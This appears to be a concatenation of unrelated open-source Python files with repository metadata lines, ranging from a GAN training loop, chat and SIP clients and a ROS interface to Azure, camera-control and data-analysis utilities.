des_count_iter = 0
val_count_iter = 0
test_count_iter = 0
val_loss_seen = float("inf")
# data read iterator
data = datasets(batch_size=batch_size, height=heigth, width=width,
custom_test_size=custom_test_size,time_frame=timesteps, interval=interval)
test_count_iter = test(sess, gen_model, data, test_writer, test_count_iter, is_store_output=True)
def train():
global best_loss
with tf.Session() as sess:
disc_model = Discriminator(heigth, width, disc_scale_level_feature_maps, disc_scale_level_kernel_size, disc_fc_layer_units)
gen_model = GenerativeNetwork(heigth_train, width_train, heigth_test, width_test, scale_level_feature_maps, scale_level_kernel_size)
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
sess.run(init)
# clear logs !
log_directory_creation(sess)
# summary !
gen_train_writer = tf.summary.FileWriter(log_dir_file_path + "gen_train", sess.graph)
des_train_writer = tf.summary.FileWriter(log_dir_file_path + "des_train", sess.graph)
test_writer = tf.summary.FileWriter(log_dir_file_path + "test", sess.graph)
val_writer = tf.summary.FileWriter(log_dir_file_path + "val", sess.graph)
global_step = 0
gen_count_iter = 0
des_count_iter = 0
val_count_iter = 0
test_count_iter = 0
val_loss_seen = float("inf")
while True:
try:
# data read iterator
data = datasets(batch_size=batch_size, height=heigth, width=width,
custom_test_size=custom_test_size,time_frame=timesteps, interval=interval)
for X_batch, y_batch, _ in data.train_next_batch():
# print ("X_batch", X_batch.shape, "y_batch", y_batch.shape)
if not is_correct_batch_shape(X_batch, y_batch, "train"):
# global step not increased !
continue
for each_timesteps in range(time_frames_to_consider, timesteps-time_frames_to_consider):
input_train = X_batch[:, each_timesteps-time_frames_to_consider:each_timesteps, :,:,:]
input_train = images_to_channels(input_train)
output_train = X_batch[:,each_timesteps,:,:,:]
disc_summary_real, disc_summary_fake, gen_summary = alternate_disc_gen_training(sess, disc_model, gen_model, input_train, output_train)
gen_train_writer.add_summary(gen_summary, gen_count_iter)
gen_count_iter += 1
des_train_writer.add_summary(disc_summary_real, des_count_iter)
des_count_iter += 1
des_train_writer.add_summary(disc_summary_fake, des_count_iter)
des_count_iter += 1
if global_step % checkpoint_iterations == 0:
save_model_session(sess, iterations + "gan_model")
if global_step % best_model_iterations == 0:
val_count_iter, curr_loss = validation(sess, gen_model, data, val_writer, val_count_iter)
if curr_loss < val_loss_seen:
val_loss_seen = curr_loss
save_model_session(sess, best + "gan_model")
if global_step % test_model_iterations == 0:
test_count_iter = test(sess, gen_model, data, test_writer, test_count_iter)
print ("Iteration ", global_step, " best_loss ", val_loss_seen)
global_step += 1
except:
print ("error occur ... skipping ... !")
train_writer.close()
test_writer.close()
def main():
train()
if __name__ == '__main__':
main()
| apache-2.0 | 2,724,290,950,432,805,400 | 49.824234 | 217 | 0.579255 | false |
mcolyer/nearby | plugins/chat-0.1/main.py | 1 | 3343 | #!/usr/bin/env python
"""
Nearby - A general message passing framework.
Copyright (C) 2005 Matthew Colyer <[email protected]>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from twisted.internet import gtk2reactor
gtk2reactor.install()
import gtk
import pango
from SimpleGladeApp import SimpleGladeApp
from twisted.internet.protocol import ClientFactory
from twisted.protocols.basic import LineReceiver
from twisted.internet import reactor
import re
class NearbyChat(SimpleGladeApp, LineReceiver):
def __init__(self, *args):
self.buffer = gtk.TextBuffer()
#Highlighted username tag
self.buffer.create_tag("user", weight=pango.WEIGHT_BOLD, foreground="blue")
SimpleGladeApp.__init__(self, "chat.glade")
self.received_text.set_buffer(self.buffer)
def connectionMade(self):
self.sendLine("REGISTER chat 0.1")
def lineReceived(self, line):
print "DEBUG:", line
receiveRe = re.compile("^RECEIVE (\S+) (\S+) (.*)$")
if not receiveRe.match(line):
#If we are passed a garbage message fail silently
return
nodeid, username, message = receiveRe.match(line).groups(1)
self.buffer.insert_with_tags_by_name(self.buffer.get_end_iter(), "%s: " % username, "user")
self.buffer.insert_at_cursor("%s\n" % message)
def new(self):
pass
def on_file_save(self, widget, data=None):
pass
def on_file_open(self, widget, data=None):
filter = gtk.FileFilter()
filter.add_pattern("*.txt")
self.dialog_file_open.set_filter(filter)
self.dialog_file_open.show()
def on_file_open_response(self, widget, response, data=None):
self.dialog_file_open.hide()
if (response == gtk.RESPONSE_OK):
pass
def on_text_entry_key_release(self, widget, event):
if gtk.gdk.keyval_name(event.keyval) == "Return":
print "SEND "+self.text_entry.get_text()
self.sendLine("SEND "+self.text_entry.get_text())
def on_quit(self, widget):
self.transport.loseConnection()
class NearbyClientFactory(ClientFactory):
protocol = NearbyChat
def startedConnecting(self, connector):
print "connecting"
def clientConnectionFailed(self, connector, reason):
print 'connection failed:', reason.getErrorMessage()
reactor.stop()
def clientConnectionLost(self, connector, reason):
print 'connection lost:', reason.getErrorMessage()
reactor.stop()
def main():
factory = NearbyClientFactory()
reactor.connectTCP('localhost', 8002, factory)
reactor.run()
if __name__ == "__main__":
main()
#vim: set ts=4 sw=4 expandtab :
| gpl-2.0 | 4,740,466,048,686,461,000 | 31.77451 | 99 | 0.685313 | false |
RobotnikAutomation/robotnik_trajectory_control | src/robotnik_trajectory_control/interfaces/device_command_interface.py | 1 | 5944 | #!/usr/bin/env python
import rospy
from threading import Thread
from sensor_msgs.msg import JointState
from rospy.exceptions import ROSException
from robotnik_msgs.msg import State
from std_srvs.srv import Empty
import time
#
# STANDARD INTERFACE
#
class DeviceCommandInterface():
'''
Class intended to communicate with controller devices by using a standard interface
'''
def __init__(self, args):
'''
Component initialization
@param args: arguments to configure the component
@type args: {name: string, command_topic: string, state_topic: string, joints: [string]}
'''
self.initialized = False
if args.has_key('type'):
self.type = args['type']
else:
self.type = 'DeviceCommandInterface'
if args.has_key('name'):
self.name = args['name']
else:
self.name = 'unnamed'
rospy.logerr('%s:init: param name not found'%self.type)
if args.has_key('command_topic'):
self.command_topic = args['command_topic']
else:
self.command_topic = ''
rospy.logerr('%s:init: param command_topic not found'%self.type)
if args.has_key('state_topic'):
self.state_topic = args['state_topic']
print 'state topic = %s'%(self.state_topic)
else:
self.state_topic = ''
rospy.logerr('%s:init: param state_topic not found'%self.type)
if args.has_key('joints'):
self.joint_names = args['joints']
else:
self.joint_names = []
rospy.logerr('%s:init: param joints not found'%self.type)
self.joint_state = JointState()
# Intermediate structure to save each pos, vel and effort value before sending the command to the component
# Ej.: {'j1': [ 0, 0, 0 ]}
self.joint_state_pointer = {}
# State of the component
self.state = State.READY_STATE
def setup(self):
'''
Initializes joint values, connect to command and state topics
@return: 0 if OK, -1 otherwise
'''
if len(self.joint_names) == 0:
rospy.logerr('%s-%s:setup: no joints provided'%(self.type, self.name))
return -1
else:
for i in range(len(self.joint_names)):
self.joint_state.name.append(self.joint_names[i])
self.joint_state.position.append(0)
self.joint_state.velocity.append(0)
self.joint_state.effort.append(0)
#
self.joint_state_pointer[self.joint_names[i]] = [ 0, 0, 0]
'''
# TODO for each component
if len(self.state_topic) > 0:
try:
self.state_subscriber = rospy.Subscriber(self.state_topic, String, self.receiveStateCb)
except ValueError, e:
rospy.logerr('%s-%s:setup: Error connecting to topic %s ->(%s)'%(self.type, self.name, self.state_topic, e))
'''
if len(self.command_topic) > 0:
try:
self.command_publisher = rospy.Publisher(self.command_topic, JointState, queue_size=1)
rospy.loginfo('%s-%s:setup: connecting to topic %s'%(self.type, self.name, self.command_topic))
except ValueError, e:
rospy.logerr('%s-%s:setup: Error connecting to topic %s ->(%s)'%(self.type, self.name, self.command_topic, e))
return -1
else:
rospy.logerr('%s-%s:setup: No command topic supplied.'%(self.type, self.name))
return -1
self.initialized = True
return 0
def setDesiredJointValue(self, name, value):
'''
Sets the joint value to desired value
@param name: name of the joint
@type name: string
@param value: desired value of the joint
@type value: array with the values of [position, velocity, effort]
@return: 0 if OK, -1 otherwise
'''
if not self.initialized:
rospy.logerr('%s-%s:setDesiredJointValue: interface not initialized correctly'%(self.type, self.name, name))
return -1
if self.joint_state_pointer.has_key(name):
if len(value) == 3:
self.joint_state_pointer[name][0] = float(value[0])
self.joint_state_pointer[name][1] = float(value[1])
self.joint_state_pointer[name][2] = float(value[2])
else:
rospy.logerr('%s-%s:setDesiredJointValue: incorrect length of desired value %s'%(self.type, self.name, value))
return -1
else:
rospy.logerr('%s-%s:setDesiredJointValue: joint %s is not associated with this interface'%(self.type, self.name, name))
return -1
return 0
def sendCommand(self):
'''
Sends the current value of joint_state attribute to the controller
@return: 0 if OK, -1 otherwise
'''
if not self.initialized:
return -1
# copy desired values into the joint_state structure
for i in range(len(self.joint_names)):
self.joint_state.position[i] = self.joint_state_pointer[self.joint_names[i]][0]
self.joint_state.velocity[i] = self.joint_state_pointer[self.joint_names[i]][1]
self.joint_state.effort[i] = self.joint_state_pointer[self.joint_names[i]][2]
#self.joint_state.position=[]
self.joint_state.header.stamp = rospy.Time.now()
#rospy.loginfo('%s-%s:sendCommand: sending command (pos = %s) to %s'%(self.type, self.name, self.joint_state.position, self.command_topic))
self.command_publisher.publish(self.joint_state)
return 0
def getState(self):
'''
Gets the state of the controller interface
@return: the state of the component based on robotnik_trajectory_msgs.msg.State
'''
return self.state
def stop(self):
'''
Stops any movement
@return: 0 if OK, -1 otherwise
'''
# Sets velocity to 0.0
for name in self.joint_names:
self.joint_state_pointer[name][1] = 0.0
self.sendCommand()
return 0
def receiveStateCb(self, msg):
'''
Callback associated with the topic state
'''
pass
def shutdown(self):
'''
Unregister ROS components
'''
if hasattr(self, 'command_publisher'):
self.command_publisher.unregister()
if hasattr(self, 'state_subscriber'):
self.state_subscriber.unregister()
self.initialized = False
def initialize(self):
'''
Initializes the component
'''
self.state = State.READY_STATE
def recover(self):
'''
Recovers the component
'''
pass
| bsd-3-clause | -7,979,857,014,212,805,000 | 25.774775 | 142 | 0.666386 | false |
mearns/pyps | setup.py | 1 | 2100 | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
import sys
sys.path.insert(0, 'pyps')
import version as proj_version
import pyps.version as proj_version
requires = [
'docit',
'colour',
]
setup(
name='pyps',
author='Brian Mearns',
author_email='[email protected]',
url='https://github.com/mearns/pyps',
license='Affero GPLv3+ --- See LICENSE.txt',
#Provide a brief description. The long description is loaded from README.rst
#description='Brief description of the package.',
#Load the version string from the built-in version module.
version=proj_version.setuptools_string(),
#Uses MANIFEST.in to decide what to put in source distribution.
include_package_data = True,
#Automaticaly search for modules, identified by __init__.py
packages = find_packages('.', exclude=["tests"]),
#Other pypi packages that are dependencies for this package.
# To specify a particular version, do like 'package (>=1.2.3)'
requires = requires,
#pypi packages that aren't necessarily required by the package, but are
# required for certain setup.py commands. These will not be installed, but will
# be downloaded into the local directory when setup.py is runn.
setup_requires = requires + [
'nose>=1.0',
'sphinx>=0.5',
'sphinx_rtd_theme',
'nosetp',
],
entry_points = {
'console_scripts': [
#'script-name=module.path:main_function',
#'pyps=pyps.main',
]
},
#Less desirable than the nosetests command, but allows you to use the
# standard `tests` command to run nosetests.
test_suite = 'nose.collector',
tests_require = requires + [
'nose>=1.0',
'pychangelog>=1.1',
'pillow>=2.2.1'
],
classifiers = [
#'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
#'Natural Language :: English',
#'Operating System :: OS Independent',
],
)
| agpl-3.0 | -7,089,841,201,979,759,000 | 26.767123 | 83 | 0.615238 | false |
PixelStereo/viscam | src/viscam.py | 1 | 3820 | #! /usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
from time import sleep
from PySide2.QtGui import QStandardItemModel, QStandardItem
from PySide2.QtCore import Slot, QDir, QAbstractListModel, Qt, QFile
from PySide2.QtWidgets import QWidget, QApplication, QHBoxLayout, QDialog, QListView, QListWidget, QPushButton, \
QTableWidget, QTableView, QFileDialog, QTableWidgetItem, QWidget, QTreeView, QMainWindow, \
QSpinBox, QGroupBox, QGridLayout, QCheckBox, QSlider, QLabel
from properties import Properties_UI
from focus import Focus_UI
from zoom import Zoom_UI
from pan_tilt import Pan_Tilt_UI
from exposure import Exposure_UI
from white_balance import WhiteBalance_UI
class Visca_UI(QGroupBox):
"""
A Visca Camera Control Panel
"""
def __init__(self, cam):
super(Visca_UI, self).__init__()
properties_UI = Properties_UI(self, cam)
whiteBalance_UI = WhiteBalance_UI(self, cam)
focus_UI = Focus_UI(self, cam)
zoom_UI = Zoom_UI(self, cam)
pan_tilt_UI = Pan_Tilt_UI(self, cam)
exposure_UI = Exposure_UI(self, cam)
mainLayout = QGridLayout()
mainLayout.addWidget(properties_UI, 1, 1, 1, 1)
mainLayout.addWidget(whiteBalance_UI, 1, 2, 1, 1)
mainLayout.addWidget(zoom_UI, 2, 1, 1, 1)
mainLayout.addWidget(focus_UI, 3, 2, 1, 1)
mainLayout.addWidget(pan_tilt_UI, 3, 1, 1, 1)
mainLayout.addWidget(exposure_UI, 2, 2, 1, 1)
self.setTitle('VISCA')
self.setLayout(mainLayout)
self.cam = cam
self.initialise_values()
self.move(40, 40)
self.refresh()
def initialise_values(self):
# -------------------------------------
# TODO
# these params needs to have UI
# -------------------------------------
IR_auto = self.cam._query('IR_auto')
# Turn off digital zoom aka zoom_digital
self.cam.zoom_digital = False
# Turn off datascreen display
self.cam.menu_off()
self.cam.info_display = False
def refresh(self):
"""
ask the camera the actual values and refresh UI
"""
# PROPERTIES
power = self.cam._query('power')
self.power.setChecked(power)
video = self.cam._query('video')
self.video.setCurrentIndex(self.video.findText(video))
IR = self.cam._query('IR')
self.IR.setChecked(IR)
FX = self.cam._query('FX')
self.FX.setCurrentIndex(self.FX.findText(FX))
# WHITE BALANCE
WB = self.cam._query('WB')
self.WB.setCurrentIndex(self.WB.findText(WB))
RGain = self.cam._query('RGain')
self.RGain.setValue(RGain)
BGain = self.cam._query('BGain')
self.BGain.setValue(BGain)
# ZOOM
self.zoom_wide_speed.setValue(3)
self.zoom_tele_speed.setValue(3)
zoom = self.cam._query('zoom')
self.zoom_direct_value.setValue(zoom)
# EXPOSURE
slowshutter = self.cam._query('slowshutter')
self.slowshutter.setChecked(slowshutter)
backlight = self.cam._query('backlight')
self.backlight.setChecked(backlight)
AE = self.cam._query('AE')
self.AE.setCurrentIndex(self.AE.findText(AE))
# PAN TILT
self.pan_speed.setValue(3)
self.tilt_speed.setValue(3)
pan,tilt = self.cam._query('pan_tilt')
self.tilt.setValue(tilt)
self.pan.setValue(pan)
# FOCUS
self.focus_far_speed.setValue(3)
self.focus_near_speed.setValue(3)
focus = self.cam._query('focus')
self.focus_direct_value.setValue(focus)
nearlimit = self.cam._query('focus_nearlimit')
self.focus_nearlimit_value.setValue(nearlimit)
| lgpl-3.0 | 7,299,021,264,485,589,000 | 36.087379 | 119 | 0.604188 | false |
albagcs/ptavi-p4 | client.py | 1 | 1158 | #!/usr/bin/python
# -*- coding: iso-8859-15 -*-
"""
Programa cliente que abre un socket a un servidor
"""
import socket
import sys
# Cliente UDP simple.
# Dirección IP del servidor.
try:
SERVER = sys.argv[1]
PORT = int(sys.argv[2])
# Contenido que vamos a enviar
METHOD = sys.argv[3]
LINE = sys.argv[4]
EXPIRES = int(sys.argv[5])
except IndexError:
sys.exit("Usage: client.py ip puerto register sip_address expires_value")
except ValueError:
sys.exit("Usage: client.py ip puerto register sip_address expires_value")
# Creamos el socket, lo configuramos y lo atamos a un servidor/puerto
my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
my_socket.connect((SERVER, PORT))
print "Enviando: " + METHOD.upper() + " sip:" + LINE + " SIP/2.0\r\n\r\n"
print "Enviando: " + str(EXPIRES)
LINE_EXPIRES = "Expires: " + str(EXPIRES) + '\r\n\r\n'
my_socket.send(METHOD.upper() + " sip:" + LINE + " SIP/2.0\r\n" + LINE_EXPIRES)
data = my_socket.recv(1024)
print 'Recibido -- ', data
print "Terminando socket..."
# Cerramos todo
my_socket.close()
print "Fin."
| gpl-2.0 | 362,235,933,809,275,900 | 27.925 | 79 | 0.680207 | false |
veltzer/pdmt | pdmt/plugins/nodes/operations/installaptsite.py | 1 | 1466 | import os
import pdmt.config
import pdmt.utils.fileops
import pdmt.utils.subproc
'''
In order for this plugin to work you have to make your web folder
be writable by the user running pdmt.
You can do this with:
$ chmod g+w -R /var/www
$ chgrp $USER -R /var/www
'''
class Operation(object):
def __init__(self):
super().__init__(
'installaptsite',
'install the apt site',
)
def run(self):
# the if is needed to avoid an exception
serv = pdmt.config.ns_apt.p_abs_dir
conf = os.path.join(serv, pdmt.config.ns_apt.p_conf)
pdmt.utils.fileops.rmtreesoft(serv)
pdmt.utils.fileops.mkdircopysoft('makot/distributions', conf)
pdmt.utils.fileops.mkdircopysoft('makot/options', conf)
pdmt.utils.fileops.mkdircopysoft('makot/index.php', serv)
# pdmt.utils.fileops.mkdir(os.path.join(serv,'pool'))
final_key = os.path.join(serv, pdmt.config.ns_apt.p_keyname)
pdmt.utils.subproc.check_output([
'gpg',
'--armour',
'--export',
'--output',
final_key,
])
pdmt.utils.fileops.chmod(final_key, 0o0444)
# the creation of the next two files is so people could start using the site although
# it is empty
pdmt.utils.fileops.create_empty_filegz(pdmt.config.ns_apt.p_file_sources)
pdmt.utils.fileops.create_empty_file(pdmt.config.ns_apt.p_file_binary)
| gpl-3.0 | -3,912,588,822,752,181,000 | 32.318182 | 93 | 0.622783 | false |
chatzipap/CIE2016 | traffic_lights_04_Light controled by time & day.py | 1 | 1526 | '''
Σηματοδότης ρυθμιζόμενος ανά ώρα και ημέρα
'''
from gpiozero import LED
from time import sleep
from datetime import datetime
# Αντιστοίχιση στοιχείων και ακίδων GPIO
red = LED(27)
orange = LED(19)
green=LED(5)
buzzer = LED(10)
# Αρχικοποίηση καταστάσεων στοιχείων
red.off()
orange.off()
green.off()
sleep(1)
# Συνάρτηση λειτουργίας σηματοδότη
def trafficLight(tRed, tGreen):
red.on()
sleep(tRed - 2)
buzzer.on()
sleep(2)
buzzer.off()
red.off()
green.on()
sleep(tGreen)
green.off()
orange.on()
sleep(2)
orange.off()
# Λίστες χρόνων
normal = [15,7] # Λίστα με χρόνους κανονικής ροής οχημάτων
high = [13,9] # Λίστα με χρόνους αυξημενης ροής οχημάτων
# Επαναληπτική διαδικασία
while True:
cHour = datetime.today().hour # cHour = τρέχουσα ώρα
cDay = datetime.today().weekday() # cDay = τρέχουσα ημέρα της εβδομάδας, 0=Δευτέρα
if cHour in [7,15,23] and cDay not in [5,6] :
# Αυξημένη ροή αυτοκινήτων
trafficLight(*high)
print ('high')
else:
# Κανονική ροή αυτοκινήτων
trafficLight(*normal)
print ('normal')
| mit | 8,030,386,594,343,667,000 | 20.535714 | 86 | 0.616086 | false |
anthonylife/ReviewBasedRatingPrediction | script/cntBasicStatics.py | 1 | 3154 | #!/usr/bin/env python
#encoding=utf8
#Copyright [2014] [Wei Zhang]
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
###################################################################
# Date: 2014/5/8 #
# Count the basic statistics of the specified dataset #
# e.g. 1.User number; 2.Item number; 3. Review Number; #
# 4.User average review num; 5. Item average review num; #
# 6.Average length of review; 7. Rating distribution. #
###################################################################
import sys, csv, json, argparse, pylab
import numpy as np
from collections import defaultdict
with open("../SETTINGS.json") as fp:
settings = json.loads(fp.read())
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d', type=int, action='store',
dest='data_num', help='choose which data set to use')
if len(sys.argv) != 3:
print 'Command e.g.: python cntBasicStatics.py -d 0(1)'
sys.exit(1)
para = parser.parse_args()
if para.data_num == 0:
review_file = settings["ROOT_PATH"] + settings["SRC_DATA_FILE1_1"]
elif para.data_num == 1:
review_file = settings["ROOT_PATH"] + settings["SRC_DATA_FILE2_1"]
else:
print 'Invalid choice of dataset'
sys.exit(1)
uid_review_cnt = defaultdict(int)
pid_review_cnt = defaultdict(int)
review_num = 0
ave_ur_num = 0
ave_pr_num = 0
ave_lenr_num = 0
rating_ratio = defaultdict(int)
for line in open(review_file):
uid, pid, rating, date, wcnt = line.strip("\r\t\n").split(" ")[:5]
uid_review_cnt[uid] += 1
pid_review_cnt[pid] += 1
review_num += 1
ave_lenr_num += int(wcnt)
rating_ratio[float(rating)] += 1
cnt_num = [[entry[0], float(entry[1])/review_num] for entry in rating_ratio.items()]
#keys = [entry[0] for entry in cnt_num]
#vals = [entry[1] for entry in cnt_num]
#width = 0.2
#pylab.xticks(np.array(keys[:50])+width/2.0, keys, rotation=45)
#pylab.bar(keys[:50], vals[:50], width, color='r')
#pylab.show()
print '1.User number:\t\t%d' % len(uid_review_cnt)
print '2.Item number:\t\t%d' % len(pid_review_cnt)
print '3.Review number:\t\t%d' % review_num
print '4.User average review num:\t\t%.2f' % (float(review_num)/len(uid_review_cnt))
print '5.Item average review num:\t\t%.2f' % (float(review_num)/len(pid_review_cnt))
print '6.Average length of review:\t\t%.2f' % (float(ave_lenr_num)/review_num)
print '7.Rating distribution:'
print cnt_num
if __name__ == "__main__":
main()
| apache-2.0 | 6,009,492,705,088,222,000 | 37 | 88 | 0.600507 | false |
QualiSystems/Azure-Shell | package/cloudshell/cp/azure/domain/vm_management/operations/refresh_ip_operation.py | 1 | 4048 | class RefreshIPOperation(object):
def __init__(self, vm_service, resource_id_parser):
"""
:param vm_service: cloudshell.cp.azure.domain.services.virtual_machine_service.VirtualMachineService
:param resource_id_parser: cloudshell.cp.azure.common.parsers.azure_model_parser.AzureModelsParser
:return:
"""
self.vm_service = vm_service
self.resource_id_parser = resource_id_parser
def refresh_ip(self, cloudshell_session, compute_client, network_client, resource_group_name, vm_name,
private_ip_on_resource, public_ip_on_resource_attr_tuple, resource_fullname, logger):
"""Refresh Public and Private IP on CloudShell resource from corresponding deployed Azure instance
:param cloudshell_session: cloudshell.api.cloudshell_api.CloudShellAPISession instance
:param compute_client: azure.mgmt.compute.ComputeManagementClient instance
:param network_client: azure.mgmt.network.NetworkManagementClient instance
:param resource_group_name: The name of the resource group
:param vm_name: The name of the virtual machine
:param private_ip_on_resource: private IP on the CloudShell resource
:param public_ip_on_resource_attr_tuple: (key,val) public IP on the CloudShell resource (we preserve public ip namespace key)
:param resource_fullname: full resource name on the CloudShell
:param logger: logging.Logger instance
:return
"""
# check if VM exists and in the correct state
logger.info("Check that VM {} exists under resource group {} and is active".format(
vm_name, resource_group_name))
public_ip_key = public_ip_on_resource_attr_tuple[0]
public_ip_on_resource = public_ip_on_resource_attr_tuple[1]
vm = self.vm_service.get_active_vm(
compute_management_client=compute_client,
group_name=resource_group_name,
vm_name=vm_name)
# find the primary nic
primary_nic_ref = next(iter(filter(lambda x: x.primary, vm.network_profile.network_interfaces)), None)
nic_reference = primary_nic_ref if primary_nic_ref else vm.network_profile.network_interfaces[0]
nic_name = self.resource_id_parser.get_name_from_resource_id(nic_reference.id)
logger.info("Retrieving NIC {} for VM {}".format(nic_name, vm_name))
nic = network_client.network_interfaces.get(resource_group_name, nic_name)
vm_ip_configuration = nic.ip_configurations[0]
private_ip_on_azure = vm_ip_configuration.private_ip_address
public_ip_reference = vm_ip_configuration.public_ip_address
if public_ip_reference is None:
logger.info("There is no Public IP attached to VM {}".format(vm_name))
public_ip_on_azure = ""
else:
public_ip_name = self.resource_id_parser.get_name_from_resource_id(public_ip_reference.id)
logger.info("Retrieving Public IP {} for VM {}".format(public_ip_name, vm_name))
pub_ip_addr = network_client.public_ip_addresses.get(resource_group_name, public_ip_name)
public_ip_on_azure = pub_ip_addr.ip_address
logger.info("Public IP on Azure: '{}'".format(public_ip_on_azure))
logger.info("Public IP on CloudShell: '{}'".format(public_ip_on_resource))
if public_ip_on_azure != public_ip_on_resource:
logger.info("Updating Public IP on the resource to '{}' ...".format(public_ip_on_azure))
cloudshell_session.SetAttributeValue(resource_fullname, public_ip_key, public_ip_on_azure)
logger.info("Private IP on Azure: '{}'".format(private_ip_on_azure))
logger.info("Private IP on CloudShell: '{}'".format(private_ip_on_resource))
if private_ip_on_azure != private_ip_on_resource:
logger.info("Updating Private IP on the resource to '{}' ...".format(private_ip_on_azure))
cloudshell_session.UpdateResourceAddress(resource_fullname, private_ip_on_azure)
| apache-2.0 | 3,281,980,548,673,135,000 | 56.014085 | 133 | 0.673666 | false |
ipselium/cpyvke | cpyvke/cpyvke.py | 1 | 5093 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright © 2016-2018 Cyril Desjouy <[email protected]>
#
# This file is part of cpyvke
#
# cpyvke is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# cpyvke is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with cpyvke. If not, see <http://www.gnu.org/licenses/>.
#
#
# Creation Date : Wed Nov 9 10:03:04 2016
# Last Modified : mar. 10 avril 2018 20:54:45 CEST
"""
-----------
DOCSTRING
@author: Cyril Desjouy
"""
import os
import sys
import locale
import logging
import argparse
import time
from jupyter_client import find_connection_file
from logging.handlers import RotatingFileHandler
from .curseswin.app import InitApp
from .curseswin.mainwin import MainWin
from .utils.config import cfg_setup
from .utils.kernel import connect_kernel, print_kernel_list
from .utils.kd import kd_status
from .utils.sockets import SocketManager
from .utils.term_colors import RED, RESET
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
def init_cf(lockfile):
""" Init connection file. """
with open(lockfile, 'r') as f:
kid = f.readline()
return find_connection_file(kid)
def with_daemon(lockfile, pidfile, cmd):
""" Launch daemon. """
os.system(cmd)
while os.path.exists(pidfile) is False:
time.sleep(0.1)
return init_cf(lockfile)
def no_lock_exit():
""" If no kd5.lock ! """
message = '{}Error :{}\tCannot find kd5.lock !\n\tFixing issues shutting down kd5...\n'
sys.stderr.write(message.format(RED, RESET))
os.system('kd5 stop')
sys.stderr.write("You can now restart cpyvke!\n")
sys.exit(1)
def parse_args(lockfile, pidfile):
""" Parse Arguments. """
parser = argparse.ArgumentParser()
parser.add_argument("-L", "--list", help="List all kernels",
action="store_true")
parser.add_argument("integer", help="Start up with existing kernel. \
INTEGER is the id of the connection file. \
INTEGER can also be the keyword 'last' for 'last kernel'",
nargs='?')
args = parser.parse_args()
pid = kd_status(pidfile)
if args.list:
print_kernel_list()
sys.exit(0)
elif os.path.exists(lockfile) and pid:
try:
cf = init_cf(lockfile)
except OSError:
sys.stderr.write('lockfile points to an unknown connection file.\n')
sys.stderr.write("Try 'kd5 stop'\n")
sys.exit(1)
if args.integer:
message = 'Daemon is already running. Dropping argument {}\n'
sys.stderr.write(message.format(args.integer))
time.sleep(1.5)
elif not os.path.exists(lockfile) and pid:
no_lock_exit()
elif args.integer == 'last' and not os.path.exists(lockfile):
no_lock_exit()
elif args.integer == 'last' and os.path.exists(lockfile):
cmd = 'kd5 last'
cf = with_daemon(lockfile, pidfile, cmd)
elif args.integer:
try:
find_connection_file(str(args.integer))
except OSError:
message = '{}Error :{}\tCannot find kernel id. {} !\n\tExiting\n'
sys.stderr.write(message.format(RED, RESET, args.integer))
sys.exit(1)
else:
cmd = 'kd5 start ' + str(args.integer)
cf = with_daemon(lockfile, pidfile, cmd)
else:
cmd = 'kd5 start'
cf = with_daemon(lockfile, pidfile, cmd)
return args, cf
def main(args=None):
""" Launch cpyvke. """
# Parse Config
cfg = cfg_setup()
config = cfg.run()
# Define Paths
logdir = os.path.expanduser('~') + '/.cpyvke/'
lockfile = logdir + 'kd5.lock'
pidfile = logdir + 'kd5.pid'
logfile = logdir + 'cpyvke.log'
# Logger
logger = logging.getLogger("cpyvke")
logger.setLevel(logging.DEBUG)
# create the logging file handler
handler = RotatingFileHandler(logfile, maxBytes=10*1024*1024,
backupCount=5)
logmsg = '%(asctime)s :: %(name)s :: %(threadName)s :: %(levelname)s :: %(message)s'
formatter = logging.Formatter(logmsg, datefmt='%Y-%m-%d - %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
# Parse arguments
args, cf = parse_args(lockfile, pidfile)
# Init kernel
km, kc = connect_kernel(cf)
# Init Curses App
sock = SocketManager(config, logger)
app = InitApp(kc, cf, config, sock)
# Run App
logger.info('cpyvke started')
main_curse = MainWin(app, sock, logger)
main_curse.display()
if __name__ == "__main__":
main()
| gpl-3.0 | 5,880,846,585,467,750,000 | 26.978022 | 91 | 0.629222 | false |
johnmgregoire/JCAPRamanDataProcess | PlateAlignViaEdge_v1.py | 1 | 12112 | import sys,os, pickle, numpy, pylab, operator
import cv2
from shutil import copy as copyfile
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import matplotlib.pyplot as plt
from DataParseApp import dataparseDialog
from sklearn.decomposition import NMF
projectpath=os.path.split(os.path.abspath(__file__))[0]
sys.path.append(os.path.join(projectpath,'ui'))
pythoncodepath=os.path.split(projectpath)[0]
jcapdataprocesspath=os.path.join(pythoncodepath, 'JCAPDataProcess')
sys.path.append(os.path.join(jcapdataprocesspath,'AuxPrograms'))
from fcns_ui import *
from fcns_io import *
